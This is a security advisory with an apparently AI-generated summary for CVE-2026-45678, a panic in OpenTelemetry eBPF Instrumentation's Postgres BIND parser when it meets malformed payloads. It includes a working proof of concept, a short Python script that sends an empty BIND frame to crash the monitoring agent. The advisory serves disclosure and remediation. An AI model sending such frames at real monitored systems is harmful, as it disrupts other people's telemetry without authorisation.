VYPR
← All advisories
High severity7.5GHSA Advisory· Published May 18, 2026· Updated May 18, 2026

OpenTelemetry eBPF Instrumentation: Postgres BIND parsing can panic on malformed payloads

CVE-2026-45678

Description

Summary

The Postgres protocol parser assumes BIND message payloads contain a valid NUL-terminated portal name. A crafted empty or unterminated payload can make OBI slice beyond the end of the captured buffer and panic.

Details

The vulnerable logic is in pkg/ebpf/common/sql_detect_postgres.go. In the BIND case, OBI converts the full payload to a string with unix.ByteSliceToString(msg.data), computes portalLen := len(portal) + 1, and then slices msg.data[portalLen:] to derive the statement name.

There is no check that msg.data actually contains a NUL terminator or even enough bytes for portalLen. With an empty payload or a truncated message, portalLen can exceed the slice length and trigger a runtime panic.

PoC

Local testing with a minimal reproducer showed the expected slice bounds out of range crash for an empty BIND payload.

Use a vulnerable build:

git checkout v0.0.0-rc.1+build
make build

Start a local Postgres instance and OBI:

docker run --rm -e POSTGRES_PASSWORD=postgres -p 5432:5432 postgres:17
sudo ./bin/obi

Send a malformed BIND frame with an empty payload:

# save as /tmp/pg-bind-poc.py
import socket, struct

tag = b'B'
length = struct.pack(">I", 4)
payload = b""

s = socket.create_connection(("127.0.0.1", 5432))
s.sendall(tag + length + payload)
s.close()

Run it:

python3 /tmp/pg-bind-poc.py

On a vulnerable build, the Postgres parser in OBI panics while processing the captured payload.

Impact

This is a remote availability issue in OBI's Postgres parser. Any attacker able to send malformed Postgres traffic to a monitored service can crash the agent and stop telemetry collection for that node or process.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

A malformed BIND message without a valid portal name can cause the OBI Postgres protocol parser to panic, crashing the agent.

Vulnerability

The vulnerability resides in the OpenTelemetry eBPF Instrumentation (OBI) Postgres protocol parser, specifically in pkg/ebpf/common/sql_detect_postgres.go around line 286 [1][2][3]. In the BIND message case, the code uses unix.ByteSliceToString(msg.data) to convert the raw payload to a string, computes portalLen := len(portal) + 1, and then slices msg.data[portalLen:] to extract the statement name. No check ensures that msg.data actually contains a NUL terminator or that portalLen does not exceed the slice length. An empty payload or a truncated message can cause portalLen to exceed the buffer bounds and trigger a runtime panic. The affected version is v0.0.0-rc.1+build (and likely earlier builds as the project is in v0 development) [1][2][3].

Exploitation

An attacker needs only the ability to send network traffic to a PostgreSQL instance monitored by OBI. No authentication is required — the attacker can send a malformed Postgres protocol BIND frame from any network position that can reach the server. The PoC demonstrates sending a minimal BIND packet with an empty payload (tag B, length 4, zero-byte payload) [2][3]. When OBI's eBPF hook captures this traffic and the parser processes the payload, the missing length validation causes an out-of-bounds slice operation and the agent panics [2][3].

Impact

Successful exploitation results in a denial of service (availability impact). The OBI agent process crashes, stopping telemetry collection (metrics, spans, attributes) for the affected node or process [2][3]. No read or write access to host data is gained — the outcome is purely a crash of the monitoring agent.

Mitigation

As of the publication date (2026-05-18), no fixed version has been released. Users are advised to monitor the OBI repository for a patched release. Since OBI is in v0 development, breaking changes between minor releases are expected; users should pin to a specific semver tag and review upgrade notes [1]. No workaround is described in the available references. The vulnerability is not listed in CISA's Known Exploited Vulnerabilities catalog as of this writing.

References
  1. GitHub - open-telemetry/opentelemetry-ebpf-instrumentation
  2. CVE-2026-45678 - GitHub Advisory Database
  3. Postgres BIND parsing can panic on malformed payloads

AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

1

Patches

0

No patches discovered yet.

Vulnerability mechanics

AI mechanics synthesis has not run for this CVE yet.

References

2

News mentions

0

No linked articles in our index yet.